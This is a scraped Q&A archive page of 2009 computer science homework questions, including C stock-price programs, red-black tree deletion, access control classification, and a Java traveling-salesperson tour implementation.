The problem is that PHP scripts run as the user id of the web server no matter whose account it
belongs to. This means that any user on that server can write PHP scripts that can access all your
files. It doesn’t matter where you place the files. If your PHP script can access them, so can
everyone else’s scripts.
PHP has a directive in the php.ini file called
safe_mode
. With safe mode enabled a large variety
of restrictions are introduced. Some of the restrictions are:
- Restrictions in which commands that can be executed
- Restrictions on which functions that can be used
- Restricts file access based on ownership of the script and target file
- Limits file upload capabilities
With proper configuration of this directive, the overall security of the PHP environment can
improve, but it can also lead to a lot of anger and frustration for the developers.
Another important directive in the php.ini file is called
open_basedir
. This option prevents any
file operations outside specified directories. If you configure this directive in a way that each user
has their folder set as the base directory:
Client A gets the directive
open_basedir=<path>/A
Client B gets
open_basedir=<path>/B
- 13 -
Creating Secure W
e
bsites in PHP and MYSQL
If safe mode is enabled combined with this directive, it gets substantially more difficult for client
A to access files or data from client B. Skilled attackers might still be able to find a way. Many
web hosts provide support for PHP, ASP and JSP on the same server. And the safe mode
directive only applies for PHP, this means that an attacker can simply use one of the other
languages supported to access your files.
Another problem with shared hosts is the problem with session files. I will discuss this more in
section 5.3.
The security directives described above can only be set by the administrators providing the
shared server. This means that it’s very important to investigate what kind of security features the
different web hosts provide before purchasing an account.
5 Sessions
5.1 What are sessions
HTTP is a stateless protocol. This means that the protocol has no built in way of maintaining the
state between two transactions. If a users request two different pages subsequently, HTTP does
not provide a way for us to tell that both request came from the same user.
The idea behind sessions is to provide a way to make this possible. If we can do this, we can
implement login functions, and display content accordingly. We can track the user’s behavior,
implement shopping carts and much more.
The way sessions are implemented is that a unique session ID is created by PHP and stored on
the client side for the lifetime of the session. A session variable can either be stored on the user’s
computer in a cookie, or passed along through the URL. The session ID acts as a key that allows
you to register particular variables as so-called session variables, which are stored on the server.
5.2 Session Security
Session security is a sophisticated topic, and sessions are a frequent target of attack. Many of the
session attacks involve impersonation, where an attacker tries to gain access to another user’s
session. For an attacker to be able to attack a session he needs access to the session identifier.
There are mainly three ways of doing this: prediction, fixation and capture.
Prediction is the process of guessing a valid session ID. This is not a likely point of attack
because the session identifier in PHP is extremely random, and therefore almost impossible to
guess.
Session fixation is the simplest method of obtaining a valid session identifier. A simple example
of session fixation can be shown in the following script:
<?php
session_start();
if(!isSet($_SESSION[‘visits’]))
$_SESSION[‘visits’] = 1;
else
$_SESSION[‘visits’]++;
echo $_SESSION[‘vistis’];
?>
This script will increment the session variable, visit, on each subsequent visit and reflect the
number of times the user has visited the page. A simple way of demonstrating session fixation is
if you visit this page with the parameter ?PHPSESSID = “456645” in the URL. This script will
then display 1 in the browser. Next try to enter the script from a complete different browser or
- 14 -
Creating Secure W
e
bsites in PHP and MYSQL
computer, but with the same session ID. You will now see the number 2 displayed in the
browser. This means that the session initiated by one user is continued by another user.
A typical session fixation attack simply uses a link or a redirect to send a user to a remote site
with a session ID appended to the URL. This can be used to launch impersonation attacks such
as session hijacking (more about this later in this section).
To protect against session fixation, it’s important to remember that the attacker has no use for
the session ID until the user has gained a raised privilege level, such as logging in. Therefore it is
a good approach to regenerate the session ID whenever there is a change in the privilege level.
This will practically eliminate the risk of session fixation.
The most common session attack is capturing a valid session ID. There are different approaches
of doing this depending on if the ID is stored in a cookie or appended in the URL.
It’s recommended that sessions ID’s are stored in cookies. This is a bit more secure since cookies
are less exposed then GET variables.
Session hijacking refers to all attacks that attempt to gain access to another user’s session.
In a simple session, all the attacker need to hijack a session is the session identifier. It’s possible
to add a little extra security by checking some parameters in the HTTP request. The most
common parameter to check against is the User-Agent entry, which contains information about
the user’s browser. If the same session identifier is presented, but the User-Agent value has
changed since the previous request it’s likely that some kind of session attack is at hand. But this
is not enough to prevent session attacks. An attacker can trick the user into visiting his site, and
obtain the correct User-Agent header. Naturally something additional is required to protect
against this situation.
One way of doing this is to hash the User-Agent parameters combined with a secret string:
<?php
$string = $_SERVER[‘HTTP_USER_AGENT’];
$string .= ‘SECRETKEY’;
$fingerprint = md5($string);
?>
For a session to be continued, both a valid session identifier and a matching fingerprint have to
be presented.
If the session identifier is passed in a cookie, the fingerprint variable should be passed appended
to the URL. In this way the attacker has to compromise both the cookie and the URL variables
in order to hijack a session.
With a security feature like this, it’s important to make sure that legitimate users aren’t treated as
criminals. One way to do this is to simply prompt the user for his password if the check fails. If
the user is not able to provide the correct password, it’s probable that an impersonation attack is
taking place.
An approach like this makes it easy for the legitimate users and hard for the attackers.
5.3 Create your own session control
Session files in PHP are by default stored in the /tmp directory. If you run your PHP application
on a shared host, the session files for every user is stored in this directory. These files can only be
read by the web server, but it’s possible to create a PHP scripts that reads them.
If the safe mode directive is enabled, this is prevented, but as mentioned in section 4 attackers
can simply use another language.
The best solution to this problem is to store your session variables in a database and create your
own functions for accessing them. In order to do this you have to use the
session_set_save_handler()
function to override PHP’s default session handling.
The following script shows a simplified example for creating your own session control:
- 15 -
Creating Secure W
e
bsites in PHP and MYSQL
<?php
//override default session functionality,
//parameters give games of functions to handle session control
session_set_save_handler(‘connect’,’disconnect’,‘get’,‘put’,‘del’,‘clean’);
function connect() {
mysql_connect( ‘host’,’myuser’,’mypasswd’ );
mysql_select_db( ‘sessions’ );
}
function disconnect(){
mysql_close();
}
function get( $sess_id ){
$sql = “select session_data from sessions where id = ‘$sess_id’”;
if( $result = mysql_query($sql) ) {
$record = mysql_fetch_assoc( $result );
return $record[‘session_data’];
}
return 0;
}
function put($sess_id, $data ){
$timestamp = time();
$data = mysql_escape_string($data);
$sql = “replace into sessions values(‘$sess_id’,‘$timestamp’,‘$data’)”;
mysql_query($sql);
}
function del($sess_id ){
$sql = “delete from sessions where id = ‘$sess_id’”
mysql_query( $sql );
}
function clean( $lifetime ) {
$min_timestamp = time() - $lifetime;
$sql = “delete from sessions where last_access < ‘$min_timestamp’”;
mysql_query($sql);
}
6 Error Handling
When developing applications, there are some general principles that should be followed. One
important principal is called “fail securely”. This means that if an error occurs during execution,
the application should handle this properly. There are several ways of doing this, but the most
important thing is that the user is informed about what has happened. It’s also important to make
sure the application stops execution without being damaged.
PHP provides several methods for handling errors. The first method is the @-operator. If you
use this operator as the first character in a line where an error may occur, the error will be
suppressed by PHP, and the execution will continue. This requires that you do some error
checking manually afterwards.
The following code shows an example using the @-operator:
<?php
@ $value/$count;
if( $count == 0 )
echo “Error Cannot divide by zero.”;
?>
Another feature provided by PHP is the die function. The script below shows how to use this
function:
- 16 -
Creating Secure W
e
bsites in PHP and MYSQL
<?php
$db = mysql_connect( $url, $user, $pass ) or
die(“Error connecting to the database. Without database access this site
cannot be displayed.”);
?>
This function is very convenient and offers a simple way of handling errors your scripts. If the
first part of the condition fails - in this case the function that connects to the database - the die
function displays an error message and stops executing the script.
PHP also provides different settings for how errors are reported. The main directives controlling
this are
error_reporting
,
display_errors
and
log_errors
. They are found in the php.ini
file. When developing your applications, the recommended settings are:
error_reporting = E_ALL
display_errors = On
log_errors = Off
This means that PHP will halt on every type of error including not initialized variables, and
display them in the browser.
It’s important to remember that this setting is not recommended when the application is running.
Because an attacker might use the error reports to discover vulnerabilities and take advantage of
them.
When your application is running, it’s recommended to set display_error to off and enable
log_errors. With this setting, all error will be written to a log file which is not readable through
the browser.
When logging all the errors, it’s important to do some error checking in the script, so that you
can generate some general error messages informing the user about what happened. These
messages should be informative to the user without revealing any technical details.
7 Conclusions
A PHP application runs in the most exposed environment possible, a universally available page
on a web server. This means that the mindset of the developers should always be on coding
applications that can withstand almost ant kind of attack. But this is very seldom the case. Web
site projects are dominated by short development times. Consequently the focus is on making the
application work as intended. This is of course important do deliver a properly functioning
application, but it does nothing to make it secure.
Even though planning and implementing the features described here demands a little more
development time, it will save a lot of time and money in the long run. If you do things right the
first time, you don’t have to spend a lot of recourses trying to fix security holes after they have
been discovered. If you consequently validate all your data with the functions described in this
report, and also take special care when using include statements and file upload functions, your
sites should at least cover the basic security requirements. This should provide enough security
for simple non commercial PHP applications without taking a lot more time.
When creating large scale commercial applications in PHP, it important that security gets a high
priority in the planning process.
PHP is amazingly easy to program in and has more built in features than almost any other
language. However all this convenience comes at a price. All the numerous settings and features
make the language counterintuitive. Even if the developers try to get it right, they can still be let
down by simply having misunderstood some of the intricacies in PHP. This does not mean that
- 17 -
Creating Secure W
e
bsites in PHP and MYSQL
PHP is a bad language. It’s just important to remember that not all vulnerabilities in a PHP
application are the programmers fault.
In this report I have tried to show some of the most common mistakes done by PHP developers,
and different approaches solving these problems. I feel that I have covered the most significant
areas, but there are also subjects I have chosen to exclude in order to limit the size of this report.
After all it’s possible to write entire books on this subject.
If you want to learn more about security in PHP, I suggest that you read the books and articles
listed below.
- 18 -
Creating Secure W
e
bsites in PHP and MYSQL
References
Books:
- PHP4 Bible ( Converse, Park )
- PHP and MySQL Web Developement secon editon( Welling, thomson )
- Secure PHP Developement ( Kabir )
- PHP Cookbook ( sklar, Trachtenberg )
- Php functions Essential Reference ( Grant, Merall, Wilson, Michlitsch )
Papers:
- PHP Security ( O'Reilly Open Source Convention Portland, Oregon USA 26 jul 2004 )
- SPI Labs - Blind SQL injection, are your web applications vulnerable ( Kevin Spett )
- SPI Labs - SQL injection, are your web applications vulnerable ( Kevin Spett )
Web Recources:
- PHP manual ( )
- PEAR manual ( )
- PHP security ( John Coggeshall ) ( )
- On the security of PHP, part 1 and 2 ( )
-
- Php Application Security ( wact.soureforge.net )
- PHP and the OWASP Top Ten Security Vulnerabilities ( )
- A study in scarlet, Exploiting common Vulnerabilites in PHP applications
( Shaun Clowes ) ( )
- Security: MySQL and PHP ( Roopa Rannorey )
- PHP and MySQL | https://www.techylib.com/el/view/bemutefrogtown/creating_secure_websites_in_php_and_mysql | CC-MAIN-2017-34 | refinedweb | 8,563 | 63.19 |
Download presentation
Presentation is loading. Please wait.
Published byDwain Merritt Modified over 5 years ago
1
Editing Java programs with the BlueJ IDE
2
Working environments to develop (= write) programs There are 2 ways to develop (write) computer programs: 1.Using an editor (e.g. gedit) and a compiler (such as javac) separately. You have seen this method in the last webnote --- abus/02/BlueJ/java.html abus/02/BlueJ/java.html 2. Using an editor and a compiler in an integrated manner
3
Working environments to develop (= write) programs (cont.) In the second way, you will need to install a special application called an Integrated Development Environment (IDE)
4
Java IDEs There are a number of Integrated Development Environment IDE) available for Java Java IDEs: Eclipse -- Eclipse is highly extensible and customizable, but hard to learn (freely available) NetBeans -- created by Sun MircoSystem (original designer of the Java programming language) (freely available) JBuilder -- top commercial Java IDE; very costly... BlueJ -- easy to learn (freely available)
5
Java IDEs (cont.) In this webnote, you will learn to edit Java programs with BlueJ In the next webnote, you will learn how to: You will learn how to program in the Java programming language later in this course compile the Java program with BlueJ run the (compiled) Java program with BlueJ
6
Java IDEs (cont.) BlueJ is freely available and it can be obtained from this website:
7
Preparation Before you can use BlueJ, you must: Login to a computer in the MathCS lab Open a terminal window Change the current (working) directory to your cs170 directory This directory is used to store CS 170 labs and homework.
8
Information about this BlueJ tutorial The tutorial is described from the perspective of the user cheung (Because it was developed by Professor Cheung) The directory used to hold the project is /home/cheung/cs170 For clarity, I have delete all files and folders from my cs170 directory.
9
Information about this BlueJ tutorial (cont.) We will write a simple Java program and store the program in a project directory called "TestProj". The "TestProj" will be contained inside the /home/cheung/cs170 directory. In other words, the absolute path of the project directory is: /home/cheung/cs170/TestProj
10
Information about this BlueJ tutorial (cont.) Here is the Simple Java program that you will enter into BlueJ: You don't need to understand this program right now; it will be explained later in the course. public class Hello { public static void main(String[] args) { System.out.println("Hello Class"); System.out.println("How is everyone doing so far ?"); }
11
Topics covered in this (short) tutorial Things you need to learn to get started with BlueJ Run the BlueJ application Create a new project in BlueJ Create a new program file Insert text into the file Delete text from the file Goto a certain line in the file Search for a pattern in the file Search and replace for a pattern with another pattern in the file Undo a change Save your work Quit without saving (because you made a mess)...
12
Starting the BlueJ IDE application Enter the following command in a terminal window: This will run BlueJ as a detached process UNIX prompt>> bluej &
13
Starting the BlueJ IDE application (cont.) You will first see an announcement window:
14
Starting the BlueJ IDE application (cont.) When it's ready, you will see the main window:
15
Create a new project BlueJ requires that each project be stored in a different directory When you create a new project, BlueJ will also create a new directory for you.
16
Create a new project (cont.) How to create a new project: Left click on the Project tab Then left click on the New Project tab:
17
Create a new project (cont.) A new window will pop up:
18
Create a new project (cont.) Enter the name of the new project directory (/home/cheung/cs170/TestProj) and click on the Create button:
19
Create a new project (cont.) When BlueJ has successful created an new project, it will show the following window:
20
Create a new program file Suppose we want to create a file that contains the following Java program (given above): public class Hello { public static void main(String[] args) { System.out.println("Hello Class"); System.out.println("How is everyone doing so far ?"); }
21
Create a new program file (cont.) Notice that the program is called class Hello This will be important in the creation procedure.
22
Create a new program file (cont.) How to create a Java program file: Left click on the New Class button:
23
Create a new program file (cont.) A new window will pop up:
24
Create a new program file (cont.) Type in the name of the "class" (which is Hello) and click OK: A new window will pop up:
25
Create a new program file (cont.) Final result: You can see the new file Hello in the TestProj area.
26
Create a new program file (cont.) To see that BlueJ has created a file, we list the content of the TestProj directory from a terminal window: The icon named Hello in BlueJ represents the program file Hello.java inside the TestProj directory.
27
Open a program file for editing If you want to edit a program file, do the following: Right click on the file icon Then left click on the Open Editor button:
28
Open a program file for editing If you want to edit a program file, do the following: A new window will pop up:
29
Open a program file for editing The new window contains the content of the file Hello.java (To verify, use "cat Hello.java" in a terminal window) BlueJ has already inserted a few things in the file Hello.java to help you start writing a Java program
30
Deleting text from a file How to delete text from a file: Highlight the text in BlueJ that you want to delete:
31
Deleting text from a file (cont.) Press the backspace key You can also press the delete key or control-X Result:
32
Inserting text into a file Use the scroll bar on the right to find the location in the file where you want to insert text. Left click at the insert location Then type in the new text. Example:
33
Insert text by copy and paste You can insert text from another window into the document in BlueJ by using the copy and paste facility: 1.Highlight any text in a window (e.g., from a webpage) The highlighted text is automatically copied in UNIX 2.(On a Windows-based PC, you need to type control-C to copy) 3.Now click in the BlueJ window at the position where you want to insert the highlighted text 4.Type control-V (for paste)
34
Replacing some text How to replace text: Delete the text Insert new text
35
Undo a change When you make a edit mistake, you can undo the last change with the undo-command: control-Z
36
Undo a change (cont.) Undo earlier changes: You can undo earlier changes by pressing control-Z multiple time The maximum number of changes can be undo is 25
37
Undo an undo Suppose you have undone a change that was in fact correct You can undo an undo operation using: control-Y (this is called a Redo operation)
38
Goto a certain line in the file A feature that is very useful when you write computer programs is: That is because compilers (an application that translates a program written in a high level language into machine code) always report an error along with the location (as a line number) in the file. Goto a certain line in a file
39
Goto a certain line in the file (cont.) How to go to line number n in a file: 1.Left click on the Tools tab 2.Then left click on the Go to Line tab
40
Goto a certain line in the file (cont.) Example: After this, a window will pop up and you can enter the desired line number
41
Goto a certain line in the file (cont.) Keyboard shortcut: The keyboard shortcut for the Go to Line function is control-L
42
Search for a text pattern Finding the next occurrence of a pattern in a file: 1.Left click on the Find tab The lower portion of the BlueJ window will change to the Find menu Example:
43
Search for a text pattern (cont.) Enter the search text pattern and click Next: The text highlighted in yellow is the next matching pattern All other matching patterned are highlighted in blue
44
Search for a text pattern (cont.) Left click on the Next button to find the subsequent matching pattern Search forward: Left click on the Prev button to search forward
45
Search and Replace Finding the next occurrence of a text pattern in a file and replace it with some other pattern: Left click on the Replace tab The lower portion of the BlueJ window will change to the Replace menu
46
Search and Replace (cont.) Example:
47
Search and Replace (cont.) 2. Enter the replacement pattern in the Replace field:
48
Search and Replace (cont.) 3.Click on the Once button to replace the current occurrence (in yellow):
49
Search and Replace (cont.) You can replace the next occurrence by clicking on Once another time. Click on All to replace every occurrence
50
Search and Replace (cont.) Hint: If you do not want to replace the current occurrence and want to continue the Search and Replace operation, then do the following: 1.Click on the text immediately after the current occurrence 2.Click Next (to find the next occurrence) 3.Continue with replace if desire
51
Search and Replace (cont.) Example:
52
Search and Replace (cont.) Click on the text immediately after the current occurrence
53
Search and Replace (cont.) Click Next Continue with the Replace operation if so desired.
54
Saving the changes Auto saving: You do not need to save your work. When you quit (close) the BlueJ window, it saves your works automatically
55
Saving the changes (cont.) Save your work explicitly: You can choose to save your work explicit by clicking of Class and then Save:
56
Quit without saving your work... You do not have this option in BlueJ
57
Exit BlueJ Before you exit BlueJ, I would recommend that you save all your changes explicitly You have learned saving your work above !!!
58
Exit BlueJ (cont.) Exiting BlueJ: To exit BlueJ, click Project in the BlueJ's main window and select Quit:
Similar presentations
© 2021 SlidePlayer.com Inc. | http://slideplayer.com/slide/5979798/ | CC-MAIN-2021-17 | refinedweb | 1,792 | 66.47 |
Architecture :: Good Design Pattern For Forum Development?Jan 12, 2011
i want to know which design pattern is good for forums web site designView 5 Replies
i want to know which design pattern is good for forums web site designView 5 Replies
We are going to develop content Management System in ASP.net. what is the good design pattern do we need to follow in order to have good design.View 2 Replies
I am a newbie to asp.net and work in a firm where the projects are quite small.
I was told by my manager that in a few weeks or so we would be getting a bigger project and I need to be well versed with Design Patterns and N tier arcihtecture.
I would really appreciate if someone could provide me some links and also drop me a few sentences on how this things are useful?
I need to design a good exception handling. That can include logging and user friendly error page etc I read more articles and got some ideas. I am not using Enterprise Library now.View 4 Replies
suggest me a good design pattern for implmenting the following? I have an object say myObject. This myObject is created using few inputs from the UI. After the creation of myObject. This object will be passed to few methods.. like method1(myObject);
method2(myObject);... method5(myObject);etc. Each methods will prepare the input for successive methods call. For example method1(myObject) will set the values necessary for the operation of method2.Then method2(myObject) will set up the values necessary for the operation of method3 and so on..Same object is used as the argument for every method calls.Which design pattern can be implemented?
I visited this Link to study about Factory design pattern. But i am confused about it still. What i understood is that we must use an Interface to define a class .In the interface we will give the prototype of functions and later on we will define it in concrete class. Is that simple concept is Factory design pattern ?View 13 Replies
how the data pass from one layer to another layer in mvc design pattern...View 2 Replies.
I'm attempting to use the DotNetCart ecommerce module in a solution we are building. The problem i'm having is that i'm finding that the included .chm documentation is quite lacking. I've brought this up with their support dept and received no help there. My question is, is there a site or forum that is a good source of information on how to use different aspects of their API?View 2 Replies
I'm developing a blog application shared by non-profit organizations. I want each organization to be able to change their own blog settings. I have taken a singleton pattern (from BlogEngine.net) and modified it. (I understand that it is no longer a singleton pattern.) I have tested this approach and it seems to work fine in a development environment. Is this pattern a good practice? Are there issues, which may arise when this is placed in a production environment?
public class UserBlogSettings
{
private UserBlogSettings()
{
Load();
}
public static UserBlogSettings Instance
{
get
{
string cacheKey = "UserBlogSettings-" + HttpContext.Current.Session["userOrgName"].ToString();
object cacheItem = HttpRuntime.Cache[cacheKey] as UserBlogSettings;
if (cacheItem == null)
{
cacheItem = new UserBlogSettings();
HttpRuntime.Cache.Insert(cacheKey, cacheItem, null, DateTime.Now.AddMinutes(1),
Cache.NoSlidingExpiration);
}
return (UserBlogSettings) cacheItem;
}
}
}
(Portions of code were omitted for brevity.)
I have seen a particular pattern a few times over the last few years. In the UI, each new record (e.g., new customers details) is stored on the form without saving to database. This clearly has been done so not clutter the database or cause unnecessary database hits.
While in the UI state, these objects are identified using a Guid. When these are a saved to the database, their associated Guids are not stored. Instead, they are assigned a database Int as their primary key.
The form can cope with a mixure of retrieved items from the database (using Int) as well as those that have not yet been committed (using Guid).
When inspecting the form (using Firebug) to see which key was used, we found a two part delimited combined key had been used. The first part is a guid (an empty guid if drawn from the database) and the second part is the integer (zero is stored if it is not drawn from the database). As one part of the combined key will always uniquely identify a record, it works rather well.
good tutorial for Mobile web development using .netView 2 Replies
This is my doubt.For example, select "Getting started" forum in asp.net site. It lists lots of threads.Whenever i click on the thread new page will be open. For example if i click a thread means it will opens a page "" and if i click another thread means it will open other page "".
My question is for each thread is there asp.net team maintains separate pages like (1535090.aspx, 1535453.aspx etc). Whats the logic behind this one?Please explain. I'm also try to want built the forum like this.
I'm a Coldfusion Web Developer and I'm finding that in my local area,work for CF Devs has become extremely scarce.There were a handful of companies that were Coldfusion houses a few years ago and it appears most of them have moved away from CF development.I'm looking to expand my skillset to improve my employment outlook, and it appears that many of the web development positions that are available to me now are focused around .NET web development.The last time i took a look at .NET as a web development platform was way back during 2.0; where I found it to be poorly organized and extremely unfocused.
Apparently somewhere along the line I missed the boat because that's where about 90% of the web development jobs in my area are now.I've done some searching on google to see if I can find a tutorial, something that's akin to hand-holding, and have come back dissapointed.
So I'm turning to the SO community to ask for links and resources that might help better explain how .NET development works in a web development capacity,and for links to these resources so I can begin boning up my knowledge and start writing practice applications.
guide in typical 4 layered architecture (having User Interface, Custom Types, Business Logic, Data Access Layer) do we follow some design pattern ? I am not clear what pattern it is or what pattern it should be called.View 3 Replies
I am using asp.net and c#.
I have a some classes. Some of the classes are having same methods insert, update and delete.
Each insert will insert different data to different table. (same for update and delete). What type of pattern can be applied for this kind of class.
I sell products throgh my website. Recently we've been given a list of rules that need to be checked against each order, to make sure it's not fraudulent. So this list of rules/fraud indicators will change and grow so I want to make sure it's easily maintainable and really solid. I'm thinking I have an abstract class rule that each of the rules implements.
abstract class Rule
{
public string Message;
public bool Success;
public void CheckOrder(OrderItem currentOrder);
}
class FakeCreditCardNumberRule : Rule
{
public string Message = "Fake CC Number Rule";
public void CheckOrder(OrderItem currentOrder)
{
currentOrder.CreditCardNumber = "1234-5678-9012-3456";
Success = false;
}
}
class ReallyLargeOrderRule : Rule
{
public string Message = "Really Large Order Rule";
public void CheckOrder(OrderItem currentOrder)
{
currentOrder.ItemsOrder.Count > 100;
Success = false;
}
}
Then I'm thinking of having a class that accepts an Order object in it's costructor and checks though the list of rules. Something like:
class FraudChecker
{
List<Rule> rules;
public FraudChecker(OrderItem currentOrder)
{
foreach(var rule in rules)
{
rule.CheckOrder(currentOrder);
}
}
}
So I was trying to think of the best place/best way to populate the FraudChecker.Rules list and started thinking there might be some nice design pattern that does something like what I'm doing. Has anyone seen a design pattern I should use here? Or can anyone think of a good place to populate this list?
I am planning to generate the UI from database.The platfrom will be ASP.net.Can anyone help in identifying the best design pattern/Architecture that suits for generating the UI and events dynamically.View 3 Replies.
Firstly - I'm not asking this question How to include a web service in MVC3? I know where the button is :-)
I'm trying to find an example of best practices of how to use the new DI / Common Service Locator framework in order to make web service calls (and code dependent on web service calls) testable. I've no experience of using NInject or the like - is that the way to go?
I wanted to know which all design pattern have you used in your application. Just wanted to see a general idea of most commonly used, popular design patterns. I was going through this site"
and it has tons of design patters, I have heard about singleton and factory but not others.
So guyz which all popular efficient patterns are there and how would you determine which one suits your app. Can we make a app without a design pattern.
And lastly which one are the most simplest ones out there which are easier to implement. | http://asp.net.bigresource.com/Architecture-good-Design-pattern-for-Forum-development--5jEUK9gpI.html | CC-MAIN-2019-09 | refinedweb | 1,604 | 66.23 |
Computer Science Archive: Questions from September 04, 2009
- Anonymous askedWrite statements that can be used to read two integers anddisplay the number of integers that lie be... Show moreWrite statements that can be used to read two integers anddisplay the number of integers that lie between them, including theintegers themselves. For example, four integers between 3 and 6: 3,4, 5, 6.• Show less2 answers
- Anonymous asked1)The double variables press_psia and temp_degrees_C hold thevalues of 767.3000 and 360.0000 respect0 answers
- Anonymous asked= O(n.l... Show morethe recurrence relation is 2T(n/2)+nso my que is how you will argue that as long as b>1T(n)<= O(n.logn)???• Show less0 answers
- Anonymous asked1)The double variables press_psia andtemp_degrees_C hold the values of 767.3000 and 360.0000respecti2 answers
- Anonymous asked0 answers
- Anonymous askedafter deleting 19 from red black tree how we get all 3 nodes black,in my solution i have 31 and 41 i... Show moreafter deleting 19 from red black tree how we get all 3 nodes black,in my solution i have 31 and 41 in red and 38 in black,plzz sendme ans of this question as early as possible
• Show less0 answers
- Anonymous asked4.21 (Financial application: comparing loans with various interestrates) Write a program that lets t1 answer
- Anonymous asked0 answers
- tejdhar askedassume that s... Show moreHow much memory does
char r = 'M';
char mfn[] = "My full name";
hold in C++ ?
assume that single char uses 1 byte ofmemory.• Show less0 answers
- Anonymous askedand name theexecutable input.Write this program to read and print the s... Show moreCompile this program input.c and name theexecutable input.Write this program to read and print the stockvalues until end-of-file signal. (Use given informationand command prompt below.)Given: #include<stdio.h>int main (void){float price;while (scanf ("%f", &price) !=EOF)printf ("%7.3f\n", price);return 0;}(Note: output should look like these values)26.37525.50025.12525.00025.2500 answers
- Anonymous askedCreate a new source file with the following convention:k7006.c (name of program). Copy the following... Show moreCreate a new source file with the following convention:k7006.c (name of program). Copy the following prototypes and themain function in your program:/* function prototypes */void plot (void);void pattern (void);void invest (float);intmain (void) {// plot ( );// pattern ( );// invest (1000);}Also, implement theplot ( ) function as follows: read the input datauntil end-of-file signal anddisplay the stock valuesgraphically instead of just printing the values. Round the stockprice downto the nearest integer, andprint that number of *'s. For example, forstock15.txt the output is:*********************************************************************************************...and to test yourimplementation, uncomment plot ( ) function callmain, compile k7006.cinto k7006 and runit as follows:k7006 <stock15.txt• Show less2 answers
- Anonymous askedneed writing-... Show moreNeed flowchart. but I don't know how flowchart.
need programming code.. I'm trying....
need writing-typed for 2-3 pages project proposal of their projectidea.
I was thinking
my projectidea is
- deaf hard of hearing: Person
- Enable deaf & HH to communicate without need forinterpreter.
- Program would need to:
- Need sign language
- be able to change spoken language to sign and text orboth.
- Have common medical terminology already programed(plus) = common information: example is name, address, ss#,Insurance, phone or etc.
I think good idea PowerPoint better for presentation. • Show less0 answers
- Anonymous askedto determine how much... Show moreUsing the provided information below(1A), implement a functioncalled invest( ) to determine how much money youwould have won or lost using the buy/sell rule. If the stock goesup 3 (or more)consecutive time periods and then down in the next period,then it is a good time to sell the stock.Analogously, if the stock goes down 3 consecutive time periodsand then up in the next period, thenit is a good time to buy the stock. The function accepts theinitial investment amount as a parameter.Assume that you will convert all of your cash to stock whenour buy/sell rule signals you to buy, and that you will convert allof your stock to cash when the rule signals you to sell. For eachtime period, print out the price, cash, shares owned, and portfoliovalue. The value of your portfolio is cash plus the number ofshares multiplied by the price per share. (For simplicity, assumethat you can buy fractionalamounts of stock, and there are no transaction fees.) Sampleoutput for stock15.txt and$10,000 as theinitial investment is shown below in (1B).
(1A):#include <stdio.h>int main(void){float price;while (scanf("%f", &price) != EOF)printf("%7.3f\n", price);return 0;}26.375
25.50025.12525.00025.250 buy27.12528.25026.000 sell25.50025.00025.125 buy25.25026.37525.500 sell25.500
(1B)
(Note: this output should show 15 periods)0 answers
- Anonymous askedBelow are some examples. classify them as mandatory, discretionary,originator access control mechani... Show moreBelow are some examples. classify them as mandatory, discretionary,originator access control mechanism or combination of morethan one access control.
1. A system where no memo can be shared without authorspermission
2. Unix file access control mechanism
3. school registrar office in which only faculty can see grades ofa student provided student gave written permission to faculty forseeing grades
4. military place where only generals can enter a specific room
please explain your answers.
Thanks
Sheryl
• Show less0 answers
- Anonymous askedViruses in computers, in addition to doing lot of harm, can deletefiles without user permission . A... Show moreViruses in computers, in addition to doing lot of harm, can deletefiles without user permission . A law was passed to completely banfiles being deleted from computer disks. With respect to computersecurity, what could be the problem resulting from this law i.e.,which aspect of security (confidentiality, integrity, availability)is affected the most. Justify your answer.
• Show less0 answers
- Mchinaus asked2) Compiling andAssembling by Hand (a)The MIPS translation of the Csegment while (save[i] == k) i +=1 answer
- Anonymous askedI'm suppose to implement the... Show morex.øi5pI'm suppose to implement the Tour.java class using the Point.java class. Can somebody explain how to do this.
Greedy heuristics. The traveling salesperson problem is a notoriously dicult combinatorial
optimization problem, In principle, one can enumerate all possible tours, but, in practice, the
number of tours is so staggeringly large (roughly N factorial) that this approach is useless. For
large N, no one knows an ecient method that can nd rst point back to itself), and
iterate the following process until there are no points left.
Nearest neighbor heuristic: Read in the next point, and add it to the current tour after the
point to which it is closest. (If there is more than one point to which it is closest, insert it
after the rst such point you discover.)
Smallest increase heuristic: Read in the next point, add add it to the current tour after the
point where it results in the least possible increase in the tour length. (If there is more than
one point, insert it after the rst such point you discover.):
1, dene a nested
class Node in the standard way.
private class Node {
private Point p;
private Node next;
public Node(Point p) { // create one Node
this.p = p;
this.next = null;
}
}/************************************************************************** Compilation: javac Tour.java* Dependencies: Point.java StdDraw.java** Note that you are not allowed to add any field variables or class* variables for this assignment. Otherwise, you will lose major points.**************************************************************************/public class Tour {private Node first; // a reference to the "first" node on the tour// a node in the circular linked listprivate static class Node {private Point p;private Node next;}// print the tour to standard outputpublic void show() {if (first == null) return;Node x = first;do {System.out.println(x.p);x = x.next;} while (x != first);}// plot the tour using standard drawpublic void draw() {// implement this using the method "drawTo" provided in Point.java}// return the length of the tourõi>x.øi5sp; public double distance() {// implement this using the method "distanceTo" provided in Point.javareturn 0.0;}// insert after the point that was most recently addedpublic void insertInorder(Point p) {Node current = new Node();current.p = p;// implement the rest}// insert Point p into the tourpublic void insertSmallest(Point p) {Node current = new Node(); // new node to insertNode bestNode = null; // insert after this nodedouble bestDelta = Double.POSITIVE_INFINITY; // it's this distance awaycurrent.p = p;// implement the rest}// nearest insertion heuristicpublic void insertNearest(Point p) {Node current = new Node(); // new node to insertNode bestNode = null; // insert after this nodedouble bestDist = Double.POSITIVE_INFINITY; // it is this distance awaycurrent.p = p;// implement the rest}}public class Point {private double x; // Cartesianprivate double y; // coordinates// create and initialize a point with given (x, y)public Point(double x, double y) {this.x = x;this.y = y;}// return Euclidean distance between invoking point p and qpublic double distanceTo(Point that) {double dx = this.x - that.x;double dy = this.y - that.y;return Math.sqrt(dx*dx + dy*dy);}// draw point using standard drawpublic void draw() {StdDraw.point(x, y);}// draw the line from the invoking point p to q using standard drawpublic void drawTo(Point that) {Point p = this;StdDraw.line(this.x, this.y, that.x, that.y);}// return string representation of this pointpublic String toString() {return "(" + x + ", " + y + ")";}// test clientpublic static void main(String[] args) {// get dimensionsint w = StdIn.readInt();int h = StdIn.readInt();StdDraw.setCanvasSize(w, h);StdDraw.setXscale(0, w);StdDraw.setYscale(0, h);StdDraw.setPenRadius(.005);// read in and plot points one at at timewhile (!StdIn.isEmpty()) {double x = StdIn.readDouble();double y = StdIn.readDouble();Point p = new Point(x, y);p.draw();}}}Zªx.øi5Wx.øi5 • Show less1 answer | 